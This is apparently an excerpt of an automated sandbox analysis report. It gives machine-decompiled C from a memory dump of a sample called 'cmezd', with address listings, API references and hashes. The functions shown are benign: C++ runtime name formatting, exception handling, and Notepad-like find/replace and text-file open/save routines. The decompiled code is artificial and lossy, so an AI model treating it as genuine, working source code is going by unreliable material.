						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t221 =  &_v16;
						E0135BD97( &_v16,  &_v32);
						goto L19;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						L14:
						__eax =  &_v32;
						_v32 = "double";
						__ecx =  &_v16;
						_v28 = 6;
						__eax = E0135BC28(__ecx,  &_v32);
						goto L19;
					case 6:
						__eax =  &_v32;
						_v32 = "long ";
						__ecx =  &_v16;
						_v28 = 5;
						__eax = E0135BD97( &_v16,  &_v32);
						goto L14;
					case 7:
						__ebx = __ebx & 0x00000003;
						goto L56;
					case 8:
						goto L18;
				}
			}













































                                                                                              0x01360109
                                                                                              0x0136010c
                                                                                              0x01360115
                                                                                              0x0136011c
                                                                                              0x013605fa
                                                                                              0x01360602
                                                                                              0x01360602
                                                                                              0x01360605
                                                                                              0x01360609
                                                                                              0x01360609
                                                                                              0x01360122
                                                                                              0x01360127
                                                                                              0x01360128
                                                                                              0x0136012b
                                                                                              0x01360131
                                                                                              0x01360134
                                                                                              0x01360137
                                                                                              0x0136013c
                                                                                              0x0136013d
                                                                                              0x01360140
                                                                                              0x0136021b
                                                                                              0x0136021e
                                                                                              0x01360286
                                                                                              0x0136028b
                                                                                              0x01360290
                                                                                              0x01360293
                                                                                              0x01360296
                                                                                              0x01360299
                                                                                              0x01360392
                                                                                              0x01360395
                                                                                              0x01360398
                                                                                              0x0136055d
                                                                                              0x0136055d
                                                                                              0x01360564
                                                                                              0x01360564
                                                                                              0x0136056b
                                                                                              0x0136056f
                                                                                              0x01360572
                                                                                              0x01360577
                                                                                              0x0136057b
                                                                                              0x0136057b
                                                                                              0x0136057e
                                                                                              0x01360590
                                                                                              0x01360590
                                                                                              0x01360593
                                                                                              0x01360593
                                                                                              0x0136059a
                                                                                              0x013605a1
                                                                                              0x013605b2
                                                                                              0x013605b4
                                                                                              0x013605bc
                                                                                              0x013605c2
                                                                                              0x013605c5
                                                                                              0x013605c8
                                                                                              0x013605dd
                                                                                              0x013605dd
                                                                                              0x013605e2
                                                                                              0x013605e8
                                                                                              0x013605ed
                                                                                              0x00000000
                                                                                              0x013605ed
                                                                                              0x01360580
                                                                                              0x01360580
                                                                                              0x01360582
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360584
                                                                                              0x01360584
                                                                                              0x01360586
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360588
                                                                                              0x01360588
                                                                                              0x0136058a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136058c
                                                                                              0x0136058e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136058e
                                                                                              0x0136039e
                                                                                              0x00000000
                                                                                              0x013603a5
                                                                                              0x013603a7
                                                                                              0x013603a8
                                                                                              0x013603aa
                                                                                              0x013603aa
                                                                                              0x013603ad
                                                                                              0x013603af
                                                                                              0x013603b2
                                                                                              0x013603b4
                                                                                              0x013603b7
                                                                                              0x013603ba
                                                                                              0x013603bd
                                                                                              0x013603c0
                                                                                              0x0136040d
                                                                                              0x0136040f
                                                                                              0x01360413
                                                                                              0x01360416
                                                                                              0x01360419
                                                                                              0x01360455
                                                                                              0x01360457
                                                                                              0x0136045c
                                                                                              0x01360467
                                                                                              0x0136046e
                                                                                              0x0136046e
                                                                                              0x0136041b
                                                                                              0x0136041e
                                                                                              0x01360429
                                                                                              0x01360430
                                                                                              0x01360435
                                                                                              0x01360437
                                                                                              0x0136043c
                                                                                              0x01360447
                                                                                              0x0136044e
                                                                                              0x0136044e
                                                                                              0x01360437
                                                                                              0x01360419
                                                                                              0x01360480
                                                                                              0x00000000
                                                                                              0x01360485
                                                                                              0x013603c9
                                                                                              0x013603d9
                                                                                              0x013603de
                                                                                              0x013603e4
                                                                                              0x013603e6
                                                                                              0x013603eb
                                                                                              0x013603f6
                                                                                              0x013603fd
                                                                                              0x01360402
                                                                                              0x01360402
                                                                                              0x01360405
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604d0
                                                                                              0x01360386
                                                                                              0x01360386
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136048d
                                                                                              0x01360494
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604dc
                                                                                              0x013604e3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604b8
                                                                                              0x0136035b
                                                                                              0x0136035b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604ec
                                                                                              0x013604ef
                                                                                              0x013604f6
                                                                                              0x013604f7
                                                                                              0x013604f8
                                                                                              0x013604ff
                                                                                              0x01360504
                                                                                              0x01360505
                                                                                              0x01360506
                                                                                              0x01360508
                                                                                              0x0136050b
                                                                                              0x0136050f
                                                                                              0x01360515
                                                                                              0x01360519
                                                                                              0x01360520
                                                                                              0x01360523
                                                                                              0x01360526
                                                                                              0x01360529
                                                                                              0x0136052b
                                                                                              0x0136052e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013604c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360531
                                                                                              0x01360534
                                                                                              0x0136053b
                                                                                              0x01360541
                                                                                              0x01360543
                                                                                              0x01360546
                                                                                              0x01360549
                                                                                              0x0136054c
                                                                                              0x0136054e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360550
                                                                                              0x01360550
                                                                                              0x01360553
                                                                                              0x01360555
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136039e
                                                                                              0x0136029f
                                                                                              0x0136037f
                                                                                              0x00000000
                                                                                              0x0136037f
                                                                                              0x013602a5
                                                                                              0x013602a8
                                                                                              0x01360337
                                                                                              0x01360337
                                                                                              0x0136033a
                                                                                              0x01360373
                                                                                              0x01360373
                                                                                              0x00000000
                                                                                              0x01360373
                                                                                              0x0136033c
                                                                                              0x0136033c
                                                                                              0x0136033f
                                                                                              0x01360367
                                                                                              0x01360367
                                                                                              0x00000000
                                                                                              0x01360367
                                                                                              0x01360341
                                                                                              0x01360341
                                                                                              0x01360344
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360346
                                                                                              0x01360346
                                                                                              0x01360349
                                                                                              0x01360354
                                                                                              0x01360354
                                                                                              0x00000000
                                                                                              0x01360354
                                                                                              0x0136034b
                                                                                              0x0136034e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136034e
                                                                                              0x013602ae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602b4
                                                                                              0x013602b4
                                                                                              0x013602b7
                                                                                              0x01360322
                                                                                              0x01360328
                                                                                              0x0136032d
                                                                                              0x00000000
                                                                                              0x0136032d
                                                                                              0x013602b9
                                                                                              0x013602b9
                                                                                              0x013602bc
                                                                                              0x013602f8
                                                                                              0x01360301
                                                                                              0x01360315
                                                                                              0x00000000
                                                                                              0x0136031a
                                                                                              0x013602be
                                                                                              0x013602be
                                                                                              0x013602c1
                                                                                              0x013602e2
                                                                                              0x013602e2
                                                                                              0x013602e9
                                                                                              0x00000000
                                                                                              0x013602e9
                                                                                              0x013602c3
                                                                                              0x013602c3
                                                                                              0x013602c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602c8
                                                                                              0x013602c8
                                                                                              0x013602cb
                                                                                              0x013602d6
                                                                                              0x013602d6
                                                                                              0x00000000
                                                                                              0x013602d6
                                                                                              0x013602cd
                                                                                              0x013602d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013602d0
                                                                                              0x01360220
                                                                                              0x01360223
                                                                                              0x0136022c
                                                                                              0x01360232
                                                                                              0x01360234
                                                                                              0x01360237
                                                                                              0x0136023a
                                                                                              0x0136023d
                                                                                              0x0136023f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360245
                                                                                              0x01360245
                                                                                              0x01360248
                                                                                              0x01360270
                                                                                              0x01360277
                                                                                              0x0136027a
                                                                                              0x00000000
                                                                                              0x0136027a
                                                                                              0x0136024a
                                                                                              0x0136024c
                                                                                              0x01360268
                                                                                              0x01360268
                                                                                              0x00000000
                                                                                              0x01360268
                                                                                              0x0136024e
                                                                                              0x01360250
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360252
                                                                                              0x01360254
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360256
                                                                                              0x01360258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136025d
                                                                                              0x00000000
                                                                                              0x01360263
                                                                                              0x00000000
                                                                                              0x01360263
                                                                                              0x0136025d
                                                                                              0x01360146
                                                                                              0x0136020b
                                                                                              0x01360212
                                                                                              0x013601bc
                                                                                              0x013601c0
                                                                                              0x013601c3
                                                                                              0x00000000
                                                                                              0x013601c3
                                                                                              0x0136014c
                                                                                              0x01360152
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136015f
                                                                                              0x00000000
                                                                                              0x01360166
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360185
                                                                                              0x0136018c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360195
                                                                                              0x0136019c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601a5
                                                                                              0x0136016d
                                                                                              0x0136016d
                                                                                              0x01360174
                                                                                              0x01360178
                                                                                              0x0136017b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601ae
                                                                                              0x013601b5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601e7
                                                                                              0x013601e7
                                                                                              0x013601ea
                                                                                              0x013601f2
                                                                                              0x013601f5
                                                                                              0x013601fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013601cd
                                                                                              0x013601d0
                                                                                              0x013601d8
                                                                                              0x013601db
                                                                                              0x013601e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360203
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: operator+$Name::operator+Name::operator=
                                                                                              • String ID:
                                                                                              • API String ID: 4045585606-0
                                                                                              • Opcode ID: f356bc6cbb1e38007190c6dc61147dce5f4ef75a6a4ff7842807a84eed4662a2
                                                                                              • Instruction ID: a957e9bd80726099b236bbadb406efd337b176e038e58d5e34cc0ad05595523a
                                                                                              • Opcode Fuzzy Hash: f356bc6cbb1e38007190c6dc61147dce5f4ef75a6a4ff7842807a84eed4662a2
                                                                                              • Instruction Fuzzy Hash: E4E148B5C0420EDBDF19CF98C58AABEBBBCAB4530CF14C15AE611A6258D7348649CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01386114 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 47%
                                                                                              			E01386114(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E0135B16E(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E0135B16E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E013662D9(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E01366189(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E01386094(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E0135B0BB(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E01384040(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E01384040(_t65, _t83);
				}
			}






































                                                                                              0x01386114
                                                                                              0x01386114
                                                                                              0x01386114
                                                                                              0x0138611b
                                                                                              0x01386124
                                                                                              0x01386243
                                                                                              0x0138612a
                                                                                              0x0138612a
                                                                                              0x0138612b
                                                                                              0x0138612c
                                                                                              0x01386136
                                                                                              0x01386139
                                                                                              0x0138613f
                                                                                              0x01386149
                                                                                              0x0138616e
                                                                                              0x01386173
                                                                                              0x01386178
                                                                                              0x0138623f
                                                                                              0x00000000
                                                                                              0x01386240
                                                                                              0x01386178
                                                                                              0x01386149
                                                                                              0x0138617e
                                                                                              0x01386181
                                                                                              0x01386184
                                                                                              0x0138618a
                                                                                              0x013861a2
                                                                                              0x013861a7
                                                                                              0x013861aa
                                                                                              0x013861ad
                                                                                              0x013861b0
                                                                                              0x013861b3
                                                                                              0x013861b9
                                                                                              0x013861bf
                                                                                              0x013861c2
                                                                                              0x013861c5
                                                                                              0x013861d4
                                                                                              0x013861d5
                                                                                              0x013861d5
                                                                                              0x013861da
                                                                                              0x013861ed
                                                                                              0x013861ef
                                                                                              0x013861f4
                                                                                              0x013861ff
                                                                                              0x01386201
                                                                                              0x01386203
                                                                                              0x0138621f
                                                                                              0x01386224
                                                                                              0x01386227
                                                                                              0x01386227
                                                                                              0x013861ff
                                                                                              0x013861f4
                                                                                              0x0138622d
                                                                                              0x0138622e
                                                                                              0x01386231
                                                                                              0x01386234
                                                                                              0x01386237
                                                                                              0x0138623a
                                                                                              0x013861c5
                                                                                              0x00000000
                                                                                              0x013861b9
                                                                                              0x01386244
                                                                                              0x01386249
                                                                                              0x0138624a
                                                                                              0x0138624b
                                                                                              0x0138624c
                                                                                              0x0138624d
                                                                                              0x0138624e
                                                                                              0x0138624f
                                                                                              0x0138625e
                                                                                              0x0138626e
                                                                                              0x01386275
                                                                                              0x0138627b
                                                                                              0x0138627c
                                                                                              0x01386288
                                                                                              0x0138628a
                                                                                              0x0138628a
                                                                                              0x01386299
                                                                                              0x01386299

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0138601A,?,?,00000000,00000000,00000000,?), ref: 01386139
                                                                                              • CatchIt.LIBVCRUNTIME ref: 0138621F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CatchEncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 1435073870-2084237596
                                                                                              • Opcode ID: 4a204615d75213f025a988ec47019f5e7269742fa6813dc8838b1835f65055a0
                                                                                              • Instruction ID: 00404616b9ae8436f77fb26bd3e16d445ddfbbe1e9191782930cc9d559af0c4d
                                                                                              • Opcode Fuzzy Hash: 4a204615d75213f025a988ec47019f5e7269742fa6813dc8838b1835f65055a0
                                                                                              • Instruction Fuzzy Hash: 064181B1900209EFDF16EF98DD82AEEBBB5FF48308F148199FA0567226D3359950DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352921 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E01352921(void* __eax) {
				struct HWND__* _t3;
				intOrPtr _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t3 =  *0x139ebd4; // 0x0
				if(_t3 == 0) {
					0x139fd68->lStructSize = 0x28;
					_t4 =  *0x139ebd0; // 0x0
					 *0x139fd6c = _t4;
					_t5 =  *0x139ebcc; // 0x0
					 *0x139fd70 = _t5;
					 *0x139fd78 = 0x139ec4c;
					asm("xorps xmm0, xmm0");
					asm("movups [0x139fd80], xmm0");
					 *0x139fd7c = 0x139ee54;
					 *0x139fd74 = 0x10001;
					_t6 = ReplaceTextW(0x139fd68);
					 *0x139ebd4 = _t6;
					__eflags = _t6;
					if(__eflags == 0) {
						return E01358D4E(_t9, _t10, _t11, _t12, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c", 0x563);
					} else {
						return _t6;
					}
				} else {
					return SetActiveWindow(_t3);
				}
			}











                                                                                              0x01352923
                                                                                              0x01352924
                                                                                              0x01352925
                                                                                              0x01352926
                                                                                              0x01352927
                                                                                              0x01352928
                                                                                              0x01352929
                                                                                              0x0135292a
                                                                                              0x0135292b
                                                                                              0x0135292c
                                                                                              0x0135292d
                                                                                              0x0135292e
                                                                                              0x0135292f
                                                                                              0x01352930
                                                                                              0x01352937
                                                                                              0x01352941
                                                                                              0x0135294b
                                                                                              0x01352950
                                                                                              0x01352955
                                                                                              0x0135295a
                                                                                              0x0135295f
                                                                                              0x01352969
                                                                                              0x0135296c
                                                                                              0x01352973
                                                                                              0x0135297d
                                                                                              0x0135298c
                                                                                              0x01352992
                                                                                              0x01352997
                                                                                              0x01352999
                                                                                              0x013529b3
                                                                                              0x0135299b
                                                                                              0x0135299b
                                                                                              0x0135299b
                                                                                              0x01352939
                                                                                              0x01352940
                                                                                              0x01352940

                                                                                              APIs
                                                                                              • SetActiveWindow.USER32(00000000), ref: 0135293A
                                                                                              • ReplaceTextW.COMDLG32(0139FD68), ref: 0135298C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ActiveReplaceTextWindow
                                                                                              • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                                                              • API String ID: 2959152451-3286657855
                                                                                              • Opcode ID: de43f4bbe1fe6a448cefd9f05ff53bff365c9e1cc9de426b6834ca453fd12083
                                                                                              • Instruction ID: 7665e588e2ef8539e2c264e0b146ca26c197e72f9644da79ed6055d2962de90f
                                                                                              • Opcode Fuzzy Hash: de43f4bbe1fe6a448cefd9f05ff53bff365c9e1cc9de426b6834ca453fd12083
                                                                                              • Instruction Fuzzy Hash: 5CF0F9B5A04701DBEF70DF69E889A113BBCBB98709F504169E825D634CD7B28198CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01351180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E01351180() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v552;
				intOrPtr _v560;
				intOrPtr _v580;
				WCHAR* _v584;
				intOrPtr _v600;
				intOrPtr _v604;
				struct tagOFNA _v608;
				struct tagOFNA _t17;
				intOrPtr _t18;
				WCHAR* _t25;
				struct tagOFNA* _t26;

				_t26 =  &_v608;
				if( *0x139f05c == 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x10], xmm0");
					asm("movups [esp+0x20], xmm0");
					asm("movups [esp+0x30], xmm0");
					asm("movups [esp+0x40], xmm0");
					_v528 = 0;
					_v532 = 0;
					_t25 =  &_v524;
					lstrcpyW(_t25, L"*.txt");
					 *_t26 = 0x58;
					_t17 =  *0x139ebd0; // 0x0
					_v608 = _t17;
					_t18 =  *0x139ebcc; // 0x0
					_v604 = _t18;
					_v600 = 0x139f470;
					_v584 = _t25;
					_v580 = 0;
					_v560 = 0x880866;
					_v544 = E01351870;
					_v540 = 0x190;
					_v552 = L"txt";
					 *0x139f934 =  *0x139f46c;
					 *0x139f938 = 0;
					return 0 | GetSaveFileNameW(_t26) != 0x00000000;
				}
				return 1;
			}



















                                                                                              0x01351181
                                                                                              0x01351194
                                                                                              0x0135119a
                                                                                              0x0135119d
                                                                                              0x013511a2
                                                                                              0x013511a7
                                                                                              0x013511ac
                                                                                              0x013511b1
                                                                                              0x013511b9
                                                                                              0x013511c1
                                                                                              0x013511cb
                                                                                              0x013511d1
                                                                                              0x013511d8
                                                                                              0x013511dd
                                                                                              0x013511e1
                                                                                              0x013511e6
                                                                                              0x013511ea
                                                                                              0x013511f2
                                                                                              0x013511f6
                                                                                              0x013511fe
                                                                                              0x01351206
                                                                                              0x0135120e
                                                                                              0x01351216
                                                                                              0x01351223
                                                                                              0x01351228
                                                                                              0x00000000
                                                                                              0x01351241
                                                                                              0x0135124b

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileNameSavelstrcpy
                                                                                              • String ID: *.txt$txt
                                                                                              • API String ID: 4227682130-571010898
                                                                                              • Opcode ID: 0f1ff04e1620bb83e430ee19be50ec3ac290fd7e0bb9f11fb279b1f78802aa98
                                                                                              • Instruction ID: d74722c2e964b8ec04f588ae60007df55f0cb503693100cb6926cb84d695e01f
                                                                                              • Opcode Fuzzy Hash: 0f1ff04e1620bb83e430ee19be50ec3ac290fd7e0bb9f11fb279b1f78802aa98
                                                                                              • Instruction Fuzzy Hash: 53111CB19093819BD750CF14D55835BBBF8FB89708F019A1DF88896294D3BA95888F82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013517A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E013517A0() {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v552;
				intOrPtr _v560;
				intOrPtr _v580;
				WCHAR* _v584;
				intOrPtr _v600;
				intOrPtr _v604;
				struct tagOFNA _v608;
				struct tagOFNA _t15;
				intOrPtr _t16;
				int _t18;
				signed char _t20;
				WCHAR* _t21;
				struct tagOFNA* _t22;

				_t22 =  &_v608;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x10], xmm0");
				asm("movups [esp+0x20], xmm0");
				asm("movups [esp+0x30], xmm0");
				asm("movups [esp+0x40], xmm0");
				_v528 = 0;
				_v532 = 0;
				_t21 =  &_v524;
				lstrcpyW(_t21, L"*.txt");
				 *_t22 = 0x58;
				_t15 =  *0x139ebd0; // 0x0
				_v608 = _t15;
				_t16 =  *0x139ebcc; // 0x0
				_v604 = _t16;
				_v600 = 0x139f470;
				_v584 = _t21;
				_v580 = 0;
				_v560 = 0x881864;
				_v544 = E01351870;
				_v540 = 0x190;
				_v552 = L"txt";
				 *0x139f934 = 0;
				 *0x139f938 = 1;
				_t18 = GetOpenFileNameW(_t22);
				_t23 = _t18;
				if(_t18 != 0) {
					return E01351260(_t20, _t23, _v584,  *0x139f934);
				}
				return _t18;
			}





















                                                                                              0x013517a1
                                                                                              0x013517a7
                                                                                              0x013517aa
                                                                                              0x013517af
                                                                                              0x013517b4
                                                                                              0x013517b9
                                                                                              0x013517be
                                                                                              0x013517c6
                                                                                              0x013517ce
                                                                                              0x013517d8
                                                                                              0x013517de
                                                                                              0x013517e5
                                                                                              0x013517ea
                                                                                              0x013517ee
                                                                                              0x013517f3
                                                                                              0x013517f7
                                                                                              0x013517ff
                                                                                              0x01351803
                                                                                              0x0135180b
                                                                                              0x01351813
                                                                                              0x0135181b
                                                                                              0x01351823
                                                                                              0x0135182b
                                                                                              0x01351835
                                                                                              0x01351842
                                                                                              0x01351848
                                                                                              0x0135184a
                                                                                              0x00000000
                                                                                              0x01351856
                                                                                              0x01351862

                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32 ref: 013517D8
                                                                                              • GetOpenFileNameW.COMDLG32 ref: 01351842
                                                                                                • Part of subcall function 01351260: CreateFileW.KERNEL32 ref: 013512A2
                                                                                                • Part of subcall function 01351260: GetFileSize.KERNEL32(00000000,00000000), ref: 013512B6
                                                                                                • Part of subcall function 01351260: GetProcessHeap.KERNEL32 ref: 013512C6
                                                                                                • Part of subcall function 01351260: HeapAlloc.KERNEL32(00000000,00000000,00000002), ref: 013512D0
                                                                                                • Part of subcall function 01351260: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 013512E6
                                                                                                • Part of subcall function 01351260: CloseHandle.KERNEL32(00000000), ref: 013512EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
